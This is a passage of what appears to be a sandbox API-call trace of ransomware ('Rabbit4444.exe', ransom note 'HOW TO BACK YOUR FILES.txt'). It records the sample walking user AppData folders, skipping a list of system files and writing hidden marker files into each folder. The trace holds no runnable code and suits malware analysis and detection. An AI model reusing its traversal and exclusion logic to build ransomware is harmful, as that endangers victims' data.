dwFileAttributes=0x82) returned 1 [0063.444] CloseHandle (hObject=0x298) returned 1 [0063.479] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC") returned 77 [0063.479] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.479] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe27bb52, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x38b51312, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xef22773c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0063.479] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.479] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.479] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.479] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.479] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe27bb52, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x38b51312, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xef22773c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.479] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.479] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.479] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.479] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.479] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.479] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef22773c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef22773c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef22773c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.479] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.479] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.479] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xe2a1d9f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab3531, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe2a1d9f, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0063.479] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.480] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.480] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0063.480] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0063.480] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0063.480] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0063.480] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0063.480] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0063.480] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0063.480] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0063.480] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0063.480] lstrcpyW (in: lpString1=0x130ebd4, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0063.480] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0063.480] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0063.480] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb0) returned 0x124478 [0063.480] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 0x1222a8 [0063.480] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xe2a1d9f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab3f21, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe2a1d9f, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0063.480] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.480] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.480] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0063.480] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0063.480] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0063.480] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0063.480] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0063.480] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0063.480] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0063.480] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0063.481] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0063.481] lstrcpyW (in: lpString1=0x130ebd4, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0063.481] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0063.481] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0063.481] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x123500 [0063.481] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x122368 [0063.481] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xe2a1d9f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab4a84, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe2a1d9f, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0063.481] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.481] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.481] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0063.481] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0063.481] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0063.481] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0063.481] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0063.481] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0063.481] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0063.481] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0063.481] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0063.481] lstrcpyW (in: lpString1=0x130ebd4, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0063.481] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0063.482] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0063.482] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x122900 [0063.482] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x1222c8 [0063.482] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2a1d9f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab537f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe2a1d9f, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0063.482] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.482] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.482] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0063.482] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0063.482] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0063.482] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0063.482] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0063.482] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0063.482] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0063.482] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0063.482] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0063.482] lstrcpyW (in: lpString1=0x130ebd4, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0063.482] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121f80 [0063.482] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa6) returned 0x118e98 [0063.482] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121f88 | out: ListHead=0xf68b0, ListEntry=0x121f88) returned 0x121fe8 [0063.482] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2a1d9f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab537f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe2a1d9f, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0063.482] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0063.482] lstrcpyW (in: lpString1=0x130ebd4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.482] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.483] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.483] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.484] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.484] CloseHandle (hObject=0x278) returned 1 [0063.484] CloseHandle (hObject=0x298) returned 1 [0063.484] GetCurrentThreadId () returned 0xd98 [0063.484] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121f88 [0063.484] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp" [0063.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118e98 | out: hHeap=0xe0000) returned 1 [0063.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121f80 | out: hHeap=0xe0000) returned 1 [0063.484] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp" [0063.484] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp\\" [0063.484] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0063.484] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.485] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.488] FlushFileBuffers (hFile=0x298) returned 1 [0063.489] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.489] CloseHandle (hObject=0x298) returned 1 [0063.489] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp") returned 82 [0063.489] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.489] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2a1d9f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab537f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef299e20, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0063.490] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.490] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.490] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.490] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.490] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2a1d9f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab537f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef299e20, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.490] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.490] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.490] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.490] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.490] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.490] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef299e20, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef299e20, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef299e20, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.490] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.490] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.490] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef299e20, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef299e20, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef299e20, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.490] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0063.490] lstrcpyW (in: lpString1=0x130ebde, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.490] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.491] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.491] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.491] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.491] CloseHandle (hObject=0x278) returned 1 [0063.491] CloseHandle (hObject=0x298) returned 1 [0063.491] GetCurrentThreadId () returned 0xd98 [0063.491] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0063.491] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory" [0063.491] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122900 | out: hHeap=0xe0000) returned 1 [0063.491] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0063.491] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory" [0063.491] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory\\" [0063.491] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0063.491] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.492] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.495] FlushFileBuffers (hFile=0x298) returned 1 [0063.496] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.496] CloseHandle (hObject=0x298) returned 1 [0063.496] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory") returned 89 [0063.496] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.496] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe2a1d9f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab4a84, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef2c001e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1028d0 [0063.496] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.496] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.496] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.496] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.497] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe2a1d9f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ab4a84, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef2c001e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.497] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.497] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.497] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.497] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.497] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.497] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: 